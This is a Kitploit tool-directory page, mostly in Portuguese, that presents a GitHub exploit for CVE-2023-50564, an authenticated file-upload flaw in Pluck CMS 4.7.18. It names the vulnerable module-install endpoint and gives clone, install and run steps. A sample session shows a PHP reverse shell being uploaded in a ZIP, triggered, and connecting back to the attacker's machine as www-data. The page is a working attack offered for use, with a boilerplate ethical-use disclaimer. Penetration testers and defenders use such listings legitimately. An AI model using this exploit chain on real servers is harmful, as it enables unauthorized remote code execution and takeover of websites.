Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-50564 — This script exploits the file upload feature in Pluck CMS v4.7.18 to upload a malicious PHP file, enabling remote access via a reverse shell. Once uploaded, this backdoor grants the attacker server access with web server permissions, allowing further actions within the system or network. | Kitploit
Ferramentas/GitHubGitHub/mrterrestrial/cve-2023-50564
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

This script exploits the file upload feature in Pluck CMS v4.7.18 to upload a malicious PHP file, enabling remote access via a reverse shell. Once uploaded, this backdoor grants the attacker server access with web server permissions, allowing further actions within the system or network.

1há 1 anoAinda não revisado
Compartilhar

CVE-2023-50564 - Exploit do Pluck CMS v4.7.18

Visão Geral

Este script explora uma vulnerabilidade de upload arbitrário de arquivo autenticado no Pluck CMS v4.7.18 (CVE-2023-50564). Aproveitando essa vulnerabilidade, um atacante autenticado pode enviar um arquivo PHP malicioso, permitindo a execução de código arbitrário (neste caso, um reverse shell).

Detalhes do Exploit

  • ID CVE: CVE-2023-50564
  • Versão Afetada: Pluck CMS v4.7.18
  • Tipo: Upload Arbitrário de Arquivo Autenticado
  • Impacto: Execução Remota de Código (RCE)

A vulnerabilidade existe no endpoint /admin.php?action=installmodule, que permite que um usuário autenticado envie um arquivo ZIP contendo arquivos arbitrários. Ao enviar um arquivo PHP malicioso, este exploit estabelece um reverse shell de volta ao atacante.

Requisitos

  • Python 3.x
  • Módulo requests: pip install requests
  • Módulo requests-toolbelt: pip install requests-toolbelt

Este script também requer um login válido para a instância do Pluck CMS, incluindo a URL alvo e a senha.

Funcionalidades do Exploit

  • Reverse Shell: O exploit envia um reverse shell PHP para o alvo e se conecta de volta à máquina do atacante.
  • Execução Interativa de Comandos: Uma vez estabelecido o reverse shell, comandos podem ser executados interativamente no alvo.
  • Detecção de Solicitação de Senha: O exploit detecta solicitações de senha (ex.: su, sudo -l) e permite que o usuário forneça entrada manualmente.

Uso

Passos para Executar o Exploit

  1. Clone o Repositório:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. Instale os Pacotes Python Necessários: Certifique-se de que os pacotes necessários estão instalados:
root@kitploit:~
pip install requests requests-toolbelt
  1. Execute o Exploit: O script requer quatro entradas: URL alvo, senha do CMS, seu endereço IP (para o reverse shell) e a porta na qual você deseja escutar.

Execute o exploit usando Python:

root@kitploit:~
 python3 exploit.py
  1. Forneça a Entrada Quando Solicitado:
  • Digite a URL alvo (ex.: example.com).
  • Digite a senha para autenticação no CMS.
  • Digite seu endereço IP para a conexão do reverse shell.
  • Digite a porta para escutar o reverse shell.
  1. Shell Interativo: Uma vez estabelecido o reverse shell, você verá um prompt Shell> para interagir com o sistema alvo.

Exemplo:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Autenticando no alvo...
 [+] Autenticação bem-sucedida.
 [*] Gerando arquivo PHP do reverse shell...
 [+] Arquivo PHP do reverse shell criado com sucesso como 'shell.php'.
 [*] Criando payload ZIP...
 [+] Arquivo ZIP criado como 'payload.zip'.
 [*] Iniciando listener do reverse shell em 10.10.14.5:4444 ...
 [*] Enviando payload para o alvo...
 [+] Payload enviado com sucesso.
 [*] Acionando reverse shell em: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Conexão recebida de ('10.10.10.1', 55678)
 Shell> whoami
 www-data

Detalhamento do Exploit

  • Autenticação: O script faz login no CMS usando as credenciais fornecidas.
  • Upload de Arquivo: Ele cria um arquivo ZIP contendo um reverse shell PHP e o envia para o endpoint vulnerável (/admin.php?action=installmodule).
  • Reverse Shell: O script aciona o arquivo PHP enviado, estabelecendo uma conexão de reverse shell de volta à máquina do atacante.

Detalhes do CVE

  • ID CVE: CVE-2023-50564
  • Endpoint Vulnerável: /admin.php?action=installmodule
  • Versão Vulnerável: Pluck CMS v4.7.18
  • Tipo: Upload Arbitrário de Arquivo Autenticado

Aviso Legal

Este script é destinado a fins educacionais e hacking ético. Ele deve ser usado apenas em ambientes onde você tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido desta ferramenta.

Licença

Este projeto está licenciado sob a Licença MIT - veja MIT License para detalhes.

Contribuição

Sinta-se à vontade para fazer um fork do repositório e enviar pull requests. Para quaisquer problemas ou solicitações de funcionalidades, por favor, abra uma issue no GitHub.

Baixar ferramenta